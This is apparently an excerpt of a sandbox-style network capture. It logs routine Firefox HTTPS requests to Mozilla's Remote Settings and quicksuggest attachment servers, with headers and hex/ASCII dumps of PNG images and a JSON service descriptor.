2024-07-26 18:11:04 UTC	1390	IN	Data Raw: 45 0f 0d 3f b7 48 1c 78 4a 10 77 a0 21 46 28 04 83 45 29 22 ee 18 2f 9f be 3b f8 c5 e5 81 66 94 d0 18 6e 45 ef fd 67 38 e3 8b 7e e2 b4 d2 51 6f 2b 26 4e f6 8d a1 7c d3 3a d5 6c 49 f2 69 a0 30 a8 65 cf 3c a6 f7 39 90 c6 cf b2 cd ad 43 d7 7d 55 1c 7c 6e 48 8a bd 37 42 80 43 47 20 41 c0 f3 27 46 44 42 14 39 14 08 b2 34 fb d8 cc 0a b7 f4 36 25 ad 27 ad 98 2d 85 2e 92 a1 10 ea c1 3b 92 12 86 33 8f b1 40 06 51 39 3f 8c 11 60 2c 9f 5d 9c 5e 71 51 3c fc a4 1a 33 aa e0 18 81 b5 4b 84 77 4c 2f 36 d4 f8 8a 75 00 32 30 02 a2 47 64 14 2e 6f 58 5b 0b de f1 0d 79 e2 c7 d4 f8 b1 3a 7f 26 b8 f6 cf 6e c9 9f 70 e6 d4 60 fc fe 04 a4 b9 10 24 09 b0 89 a4 26 4c 13 61 e0 6e ff 29 8d 8a 5b f5 41 bd f8 56 7b ec bb 28 d0 9e 9a a1 11 3a f3 14 88 fc f1 eb dc 37 2e 84 ea 64 50 e5 66 Data Ascii: E?HxJw!F(E)"/;fnEg8~Qo+&N\|:lIi0e<9C}U\|nH7BCG A'FDB946%'-.;3@Q9?`,]^qQ<3KwL/6u20Gd.oX[y:&np`$&Lan)[AV{(:7.dPf
2024-07-26 18:11:04 UTC	1390	IN	Data Raw: 5c a6 b9 0b ca 6d 64 07 ec a3 7f a1 b1 b3 d4 e4 59 04 02 01 d8 06 da 79 65 fa f5 c4 83 da a7 1d 66 9f 58 e0 7f fc 95 b8 ad a6 b1 d1 68 35 d5 bb ae 28 9d f5 89 02 80 4c 51 08 df 10 2c 51 4a 26 7c 41 6e 28 16 2a 13 d2 05 26 72 e8 98 52 a1 c2 f6 49 02 95 80 5c 8e df 63 60 db 92 78 c7 7a fd c4 b2 66 ef 96 60 ee 69 80 21 65 c4 28 34 b5 1c 02 a3 7e 9e 4f 86 9d ca d9 0a 94 a5 d9 c7 a5 f3 8e 90 27 5f 2c 0f 3a 49 4f dc 33 f9 d3 55 62 cb 72 85 1e ab e3 2a f5 ee b4 de 97 5f f8 f5 b6 0f 7e 3b e9 1d 30 cb 96 86 a5 c4 86 e4 7d 59 e7 16 c4 8b 2d 59 7a 29 4a 98 3c 20 02 13 02 7b 40 2f 05 35 a1 99 65 db 46 d7 6a 17 7c 53 c7 25 65 0a 54 5c 40 28 2c 92 40 3d eb f0 0c bd 7e e4 81 6a 58 e5 b8 93 45 5d e4 ca 95 6a da 0e 34 1f be c5 8c df 3b 98 3c 33 01 52 26 07 b6 4d ad 05 aa Data Ascii: \mdYyefXh5(LQ,QJ&\|An(&rRI\c`xzf`i!e(4~O'_,:IO3Ubr_~;0}Y-Yz)J< {@/5eFj\|S%eT\@(,@=~jXE]j4;<3R&M
2024-07-26 18:11:04 UTC	1390	IN	Data Raw: 16 58 24 1c 14 be 62 2a 8f ce 17 0f fe 51 56 3d d7 da c2 7a 4d 34 07 b1 35 88 4d c7 89 a7 96 91 49 4e b9 43 61 50 15 5e 19 4b 79 10 90 2f 75 e2 70 3d 58 76 fb d0 e2 ab d5 60 53 8c db bd a8 74 05 a4 b5 1d 49 c1 36 9e 4a 05 0a c3 48 90 12 eb 8c 58 90 97 40 05 a0 ae 8e 97 43 eb 8b 65 8f c8 6a bb 02 48 3b 4a e1 d2 a5 59 ff 96 f8 80 33 51 6a 07 4e 82 10 e0 90 04 a3 2a 36 3f 9e 5f 71 82 18 6e d6 da 6a d4 ea c3 3c 17 e7 5d 56 79 f3 e5 06 9c ca 38 21 26 a4 78 8f c3 ea d5 0e 5e 74 5b 45 35 f5 8e 8d 51 cf 26 8e 47 13 14 f4 a2 eb 2e 5e 02 01 46 39 f2 20 0a a1 bc b0 82 40 4a 15 12 2e 5b 92 b4 7a 83 03 4f 8f 66 9d d2 ba eb a7 58 6a 17 9b 9f 4b 1f bf 8d 0e 38 a3 28 77 69 e7 05 b4 0c 95 88 2d 22 95 f6 3a d9 f8 46 ff 86 65 76 f4 44 03 96 d0 45 a6 c2 d5 40 8b 2c e8 ae 27 Data Ascii: X$bQV=zM45MINCaP^Ky/up=Xv`StI6JHX@CejH;JY3QjN6?_qnj<]Vy8!&x^t[E5Q&G.^F9 @J.[zOfXjK8(wi-":FevDE@,'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.5	64267	34.117.121.53	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:04 UTC	334	OUT	GET /main-workspace/quicksuggest/05f7ba7a-f7cf-4288-a89f-8fad6970a3b8 HTTP/1.1 Host: firefox-settings-attachments.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:04 UTC	730	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AHxI1nMWg2n4IuXolDcb3lZJO2paps4c2dvBBKx307VwbTsJ0k06yjzU7npB-MKG8WHaWHT3664 x-goog-generation: 1678716155293396 x-goog-metageneration: 1 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 2878 x-goog-meta-goog-reserved-file-mtime: 1654868094 x-goog-hash: crc32c=ayCXZg== x-goog-hash: md5=0XPhNrH04UTscTqW4MTe4A== x-goog-storage-class: STANDARD Accept-Ranges: bytes Content-Length: 2878 Server: UploadServer Date: Fri, 26 Jul 2024 03:43:07 GMT Cache-Control: public,max-age=604800 Age: 52077 Last-Modified: Mon, 13 Mar 2023 14:02:35 GMT ETag: "d173e136b1f4e144ec713a96e0c4dee0" Content-Type: application/octet-stream Alt-Svc: clear Connection: close
2024-07-26 18:11:04 UTC	660	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 0b 05 49 44 41 54 78 da ed 5c 49 4f 15 4b 14 f6 0f bc ad 2b 57 2e 58 b8 70 71 13 13 12 62 62 4c 08 21 c6 b8 30 10 63 34 10 0d 06 12 35 28 11 d0 28 fa 14 04 14 45 12 07 46 35 82 10 07 06 71 00 64 10 0d 08 82 04 51 1c 10 10 64 32 80 82 03 b3 57 7d 5f ac bc 7a f5 ba bb 9a be 7d a7 06 cf b7 b8 b9 43 f7 b9 55 e7 ab 3a 75 ce a9 53 bd e4 17 c1 ab 58 42 2a 20 02 88 00 02 11 40 04 10 88 00 22 80 40 04 10 01 04 22 80 08 20 10 01 44 00 81 08 20 02 08 44 00 11 40 20 02 88 00 02 11 40 04 10 88 00 22 80 40 04 10 01 04 22 80 08 20 10 01 44 00 81 08 20 02 08 1e 25 a0 b8 b8 38 26 26 26 31 31 31 2d 2d ed ea d5 ab 25 25 25 d5 d5 d5 75 75 75 cf 9e 3d 7b fd fa 75 77 77 77 Data Ascii: PNGIHDRL\IDATx\IOK+W.XpqbbL!0c45((EF5qdQd2W}_z}CU:uSXB* @"@" D D@ @"@" D %8&&&111--%%%uuu={uwww
2024-07-26 18:11:04 UTC	1390	IN	Data Raw: 35 a5 29 f9 e3 c7 8f b0 15 e1 e1 e1 8a d1 a4 56 1f 7b 0f 05 c1 1a 7c fb f6 4d 53 da ec ec 2c 0c 0e 14 aa a9 32 4e e4 b2 65 cb 0a 0a 0a 60 91 b8 05 53 60 66 66 06 76 06 06 4a 67 76 e2 fd ae 5d bb d0 78 0c 26 8f 2e c2 cd cd cd be be be 46 54 0f c0 76 1b 91 f9 f3 e7 4f 2c 15 fa a2 00 8c 00 83 8d c4 95 32 db 05 8b 3f 36 36 66 50 8e da 54 f2 86 61 35 f2 9a 17 84 89 bf 71 e3 c6 79 27 41 69 69 a9 a8 e2 79 c5 26 25 25 c9 e6 38 b0 63 c7 0e 87 1a 09 8b a4 18 b0 00 06 b5 a3 9d dd b2 65 8b c2 48 e2 0d 96 71 2f bb a1 18 44 98 c8 ea 19 2a ce 77 99 a1 90 01 66 6a e5 ca 95 32 3a e3 e2 e2 1c 92 06 cf 4a c1 e2 de bd 7b 4d f4 34 3f 3f 5f d1 4d 98 41 4b c4 01 70 43 75 86 3f d6 31 13 32 e1 d5 c8 fc a2 15 2b 56 c0 34 1b 17 75 e7 ce 1d 05 01 32 8b 6f 90 48 be 6e 63 45 b4 4a 20 Data Ascii: 5)V{\|MS,2Ne`S`ffvJgv]x&.FTvO,2?66fPTa5qy'Aiiy&%%8ceHq/D*wfj2:J{M4??_MAKpCu?12+V4u2oHncEJ
2024-07-26 18:11:04 UTC	828	IN	Data Raw: 19 ce a4 f3 2c 4a 80 dd 6e 0f 0c 0c 94 d9 6e 18 96 79 25 4c 4c 4c f0 bb 58 d6 93 61 db b6 6d 46 ce e7 68 02 c1 a0 6b 8b ce ad 4b 00 50 53 53 a3 73 54 11 ce a5 fe ed 62 b1 bf 68 2b c4 58 4f 5d 23 ac 7f 22 63 ed da b5 9e 0c be bc 4c c0 cc cc 8c 4e d1 4a 4b 4b 8b ce bd a3 a3 a3 fc 7a 45 9e 12 cc 89 1b 70 c6 dd a1 17 2f 5e 78 38 f8 f2 32 01 40 46 46 86 4c 53 fa f9 af b4 b4 34 7e 8b ba c8 ee c9 93 27 32 6a 31 b4 35 8f 13 c1 ca f3 b3 3d b8 1e 04 ff 11 04 0c 0d 0d e9 e4 47 65 4e c8 e0 e0 20 bf 3e 29 29 49 f3 1a 9d 05 e6 fe fd fb fa de a7 5b 77 be ac 45 00 70 e4 c8 11 d9 96 96 ac 7c 31 32 32 92 5f 23 3b 12 5d 55 55 25 3b d2 ee e7 e7 a7 9e 04 a7 4f 9f e6 ff ee b1 e0 cb 12 04 88 05 cf ea d9 30 3c 3c ac b8 9e 3b 9a 80 4e a6 13 4b a8 cc 19 c5 ab a2 b8 81 3f 58 02 af Data Ascii: ,Jnny%LLLXamFhkKPSSsTbh+XO]#"cLNJKKzEp/^x82@FFLS4~'2j15=GeN >))I[wEp\|122_#;]UU%;O0<<;NK?X

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.5	64265	34.117.121.53	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:04 UTC	334	OUT	GET /main-workspace/quicksuggest/f11c1bba-0d2e-44d8-acb1-e375719dd8b8 HTTP/1.1 Host: firefox-settings-attachments.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:04 UTC	688	IN	HTTP/1.1 200 OK x-goog-generation: 1721840737330465 x-goog-metageneration: 1 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 2465 x-goog-hash: crc32c=wLsfOg== x-goog-hash: md5=IF/FqzIgnVg9fQhntHoWOw== x-goog-storage-class: STANDARD Accept-Ranges: bytes Content-Length: 2465 X-GUploader-UploadID: AHxI1nPBRv30YnSQc-989dPLWO6qOe5ikStM4LBFp5Sl9XxhOsonFeI8dCW2bl6CzF2tG0T8C8-s25YQHQ Server: UploadServer Date: Wed, 24 Jul 2024 17:30:09 GMT Cache-Control: public,max-age=604800 Last-Modified: Wed, 24 Jul 2024 17:05:37 GMT ETag: "205fc5ab32209d583d7d0867b47a163b" Content-Type: application/octet-stream Age: 175255 Alt-Svc: clear Connection: close
2024-07-26 18:11:04 UTC	702	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 09 68 49 44 41 54 78 da ed 9c 5b 48 15 7f 10 c7 b5 ac cc bc 65 52 16 15 d2 95 cc 88 2e 06 96 19 94 44 f5 60 3d 44 50 0a 45 37 23 ba 11 15 48 45 85 d1 83 45 2f 12 51 28 19 64 f7 7a 88 ac a8 1e 82 48 ed 06 11 94 25 65 11 74 52 90 8c cc b2 9b fe 07 07 86 f9 cf 6f f7 1c 3d ed c1 3d e7 cc e7 61 d9 5d 73 77 7f 33 f3 fb ce cc 6f d7 22 22 14 45 51 14 45 51 14 45 51 14 45 51 14 45 51 14 45 51 14 45 51 14 45 51 14 45 51 14 45 51 14 45 51 14 45 51 14 45 51 14 45 51 14 45 09 07 7a f7 ee 0d db c8 c8 48 3a c3 f7 c3 90 5e bd 7a 89 33 64 10 b4 95 93 e0 a5 f9 2d fb f6 ed 1b d9 09 fd 83 30 f1 87 18 26 d8 24 2a 2a ca d2 3d a6 87 9c b9 3d 5c d7 bb ad 43 db 13 30 7c 08 70 Data Ascii: PNGIHDRL\hIDATx[HeR.D`=DPE7#HEE/Q(dzH%etRo==a]sw3o""EQEQEQEQEQEQEQEQEQEQEQEQEQEQEzH:^z3d-0&$**==\C0\|p
2024-07-26 18:11:04 UTC	1390	IN	Data Raw: e3 a3 9c 3e 7d da cd e1 2f 4a 06 d1 2e 99 15 1d fc 1b 90 f5 fd fb f7 df bb 77 af c3 0a 30 3d 28 fe 96 2d 5b 68 d4 42 a9 9c ac 3e b8 f5 79 4c 41 d1 49 e1 00 13 d3 6e 35 ca 25 3e b0 cc 87 10 e6 24 32 31 31 31 e9 e9 e9 3b 76 ec b8 7b f7 2e 28 2a 0a 0b 80 fa 0e 16 47 a5 85 c3 ca ca ca cc cc 4c 33 6f 8b c6 c8 c9 5a 1c bb 38 ee 83 3d 7b f6 d0 4c 04 66 cc 98 41 c1 e5 fe 62 11 f7 71 44 d0 3c 42 b5 7e f6 ec 59 50 18 12 74 1c 1a 8d 8e b4 fe d8 b1 63 63 c7 8e 45 2b 53 51 64 da d7 d2 df fe 6b 11 fd 26 c9 e2 92 25 4b e8 e1 60 e7 c7 8f 1f 98 f7 83 65 91 60 d4 a8 51 0b 17 2e 2c 2f 2f 6f 6c 6c 6c ef 84 82 89 0e 09 38 7c fa f4 e9 ba 75 eb 2c cd 2d aa 58 51 a6 3b bf 1e 8c b7 f9 f2 e5 0b 59 1f 9e ef fb f7 ef 90 a9 02 d7 ee 8a c8 b5 2b e1 71 e4 54 c2 9b c6 9a 36 6d 1a 54 eb Data Ascii: >}/J.w0=(-[hB>yLAIn5%>$2111;v{.(*GL3oZ8={LfAbqD<B~YPtccE+SQdk&%K`e`Q.,//olll8\|u,-XQ;Y+qT6mT
2024-07-26 18:11:04 UTC	373	IN	Data Raw: 73 73 73 b9 76 9b 4b 37 dd f5 04 ff fc 06 3a a9 c2 c2 c2 84 84 04 7a 1f 62 57 4d da bd a1 0d 91 6c cc 6b 64 d3 19 67 ce 9c e1 7d 7f b7 16 0f b8 fe e0 af e3 24 78 fb f6 6d 7e 7e 7e 7c 7c 3c ff 2c 90 3f 83 9d d6 5b 7e 82 19 ca 79 18 87 77 e9 d2 25 bb c0 b7 5b cb e4 8b 0a 54 6b 42 c8 97 95 95 8d 1e 3d 3a 42 e9 ae 0f 4a 4b 4b 69 b9 06 e1 cb 32 5e d6 70 30 f0 ab aa aa 96 2f 5f 9e 92 92 42 f1 1b e6 7f d8 ed 4f 6e c8 c8 c8 c0 ce c0 ac 61 cc 37 04 70 d2 e3 f1 9c 3b 77 ae a0 a0 00 74 03 3f e9 09 d9 06 2a a0 08 ab 4d 98 30 a1 b8 b8 b8 ba ba ba a5 a5 a5 ad 13 f0 01 54 4a ad ad ad 50 32 3d 7b f6 ac bc bc 7c ed da b5 e9 e9 e9 54 50 72 47 9a a2 af f8 7e 3d 20 92 33 2d 0c 80 a4 80 a0 8f 1f 3f 3e 35 35 35 29 29 89 57 87 e2 4f 38 23 fe ff 49 b7 e2 8f 16 e1 df c6 d0 6a 9d Data Ascii: sssvK7:zbWMlkdg}$xm~~~\|\|<,?[~yw%[TkB=:BJKKi2^p0/_BOna7p;wt?*M0TJP2={\|TPrG~= 3-?>555))WO8#Ij

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.5	64266	34.149.100.209	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:04 UTC	266	OUT	GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:04 UTC	510	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 939 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:27:33 GMT Age: 2611 Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:04 UTC	880	IN	Data Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 38 2e 31 2e 31 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a Data Ascii: {"project_name":"Remote Settings PROD","project_version":"18.1.1","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"readonly":true,"batch_max_requests":
2024-07-26 18:11:04 UTC	59	IN	Data Raw: 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d Data Ascii: :"https://firefox-settings-attachments.cdn.mozilla.net/"}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.5	64264	34.149.100.209	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:04 UTC	266	OUT	GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:04 UTC	510	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 939 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:27:33 GMT Age: 2611 Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:04 UTC	880	IN	Data Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 38 2e 31 2e 31 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a Data Ascii: {"project_name":"Remote Settings PROD","project_version":"18.1.1","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"readonly":true,"batch_max_requests":
2024-07-26 18:11:04 UTC	59	IN	Data Raw: 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d Data Ascii: :"https://firefox-settings-attachments.cdn.mozilla.net/"}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.5	64268	34.117.121.53	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:04 UTC	334	OUT	GET /main-workspace/quicksuggest/d9c6e436-11b1-4ae1-8d6f-e109d59d5069 HTTP/1.1 Host: firefox-settings-attachments.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:04 UTC	688	IN	HTTP/1.1 200 OK x-goog-generation: 1721840738603574 x-goog-metageneration: 1 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 7137 x-goog-hash: crc32c=EyNSRQ== x-goog-hash: md5=+FNwBtw3XaIztWNF2b80xQ== x-goog-storage-class: STANDARD Accept-Ranges: bytes Content-Length: 7137 X-GUploader-UploadID: AHxI1nMYjQa7XGrNItts_oNCvxgKo9Q977Gh6hz05hr9047oWbi7sTyqBuD5ruzNgRdC31DbsTO6yTE-Rg Server: UploadServer Date: Wed, 24 Jul 2024 17:30:08 GMT Cache-Control: public,max-age=604800 Last-Modified: Wed, 24 Jul 2024 17:05:38 GMT ETag: "f8537006dc375da233b56345d9bf34c5" Content-Type: application/octet-stream Age: 175256 Alt-Svc: clear Connection: close
2024-07-26 18:11:04 UTC	702	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 06 00 00 00 c3 3e 61 cb 00 00 00 09 70 48 59 73 00 00 17 12 00 00 17 12 01 67 9f d2 52 00 00 0b 72 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 36 20 37 39 2e 31 36 34 37 35 33 2c 20 32 30 32 31 2f 30 32 2f 31 35 2d 31 31 3a 35 32 3a 31 33 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 Data Ascii: PNGIHDR>apHYsgRriTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.164753, 2021/02/15-11:52:13 "> <rdf:RD
2024-07-26 18:11:04 UTC	1390	IN	Data Raw: 78 69 66 3d 22 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 65 78 69 66 2f 31 2e 30 2f 22 20 78 6d 70 3a 43 72 65 61 74 6f 72 54 6f 6f 6c 3d 22 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 32 2e 33 20 28 4d 61 63 69 6e 74 6f 73 68 29 22 20 78 6d 70 3a 43 72 65 61 74 65 44 61 74 65 3d 22 32 30 32 31 2d 30 38 2d 30 39 54 31 30 3a 35 31 3a 34 33 2d 30 34 3a 30 30 22 20 78 6d 70 3a 4d 65 74 61 64 61 74 61 44 61 74 65 3d 22 32 30 32 32 2d 30 36 2d 30 31 54 31 30 3a 33 39 3a 30 32 2d 30 34 3a 30 30 22 20 78 6d 70 3a 4d 6f 64 69 66 79 44 61 74 65 3d 22 32 30 32 32 2d 30 36 2d 30 31 54 31 30 3a 33 39 3a 30 32 2d 30 34 3a 30 30 22 20 70 68 6f 74 6f 73 68 6f 70 3a 43 6f 6c 6f 72 4d 6f 64 65 3d 22 33 22 20 70 68 6f 74 6f 73 68 6f 70 3a 49 43 43 Data Ascii: xif="http://ns.adobe.com/exif/1.0/" xmp:CreatorTool="Adobe Photoshop 22.3 (Macintosh)" xmp:CreateDate="2021-08-09T10:51:43-04:00" xmp:MetadataDate="2022-06-01T10:39:02-04:00" xmp:ModifyDate="2022-06-01T10:39:02-04:00" photoshop:ColorMode="3" photoshop:ICC
2024-07-26 18:11:04 UTC	1390	IN	Data Raw: 38 62 61 31 32 34 35 63 2d 65 35 32 63 2d 34 38 31 30 2d 61 35 31 63 2d 62 34 65 37 61 39 36 38 62 33 36 33 22 20 73 74 45 76 74 3a 77 68 65 6e 3d 22 32 30 32 32 2d 30 36 2d 30 31 54 31 30 3a 33 39 3a 30 32 2d 30 34 3a 30 30 22 20 73 74 45 76 74 3a 73 6f 66 74 77 61 72 65 41 67 65 6e 74 3d 22 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 32 2e 33 20 28 4d 61 63 69 6e 74 6f 73 68 29 22 20 73 74 45 76 74 3a 63 68 61 6e 67 65 64 3d 22 2f 22 2f 3e 20 3c 72 64 66 3a 6c 69 20 73 74 45 76 74 3a 61 63 74 69 6f 6e 3d 22 63 6f 6e 76 65 72 74 65 64 22 20 73 74 45 76 74 3a 70 61 72 61 6d 65 74 65 72 73 3d 22 66 72 6f 6d 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 76 6e 64 2e 61 64 6f 62 65 2e 70 68 6f 74 6f 73 68 6f 70 20 74 6f 20 69 6d 61 67 65 2f 70 6e 67 22 2f 3e Data Ascii: 8ba1245c-e52c-4810-a51c-b4e7a968b363" stEvt:when="2022-06-01T10:39:02-04:00" stEvt:softwareAgent="Adobe Photoshop 22.3 (Macintosh)" stEvt:changed="/"/> <rdf:li stEvt:action="converted" stEvt:parameters="from application/vnd.adobe.photoshop to image/png"/>
2024-07-26 18:11:04 UTC	1390	IN	Data Raw: dd f4 39 bd 36 d0 2e 06 50 95 8f ff a1 c0 7b cd 26 5d 22 b7 13 18 d4 e9 53 cc e1 a0 50 bb 18 a0 7a 4c a3 58 64 ce 78 7b ef a3 03 f3 98 c3 6a a0 75 0c 50 b1 85 dd b1 fe ed 59 6f 7a 04 d0 c3 10 73 56 0d b4 c2 0b a8 09 f3 44 ba d6 3f 94 da c9 bc 56 84 45 c0 d3 c3 24 a8 0d 3b a7 5b 27 01 2a c4 94 52 1c e3 eb 74 33 dd 21 21 e6 41 91 79 06 45 1b 06 1f 5a cc 00 c3 de 42 26 c2 e9 76 5a c9 41 98 93 6b 03 ad 56 01 43 0c 8a cc 53 8a 53 07 a9 53 29 a6 80 37 02 4f 0d 85 a2 96 a0 b5 12 60 c8 98 06 16 41 d8 ea cf d3 3c d2 67 e8 6a a0 0d 68 3d 03 0c 49 15 f4 88 ef d8 23 55 b6 47 90 9d 6f 1b 0a 35 2d 42 eb 19 60 08 98 8f 23 f8 e3 83 eb 5a 6e 14 8a b0 16 ad 06 e6 0c 46 86 01 06 58 fa 9d 02 16 11 18 74 f3 d9 05 33 6e e0 78 9e a1 87 99 46 1d 23 c3 00 d0 77 f0 47 8b 7f cb cd Data Ascii: 96.P{&]"SPzLXdx{juPYozsVD?VE$;['*Rt3!!AyEZB&vZAkVCSSS)7O`A<gjh=I#UGo5-B`#ZnFXt3nxF#wG
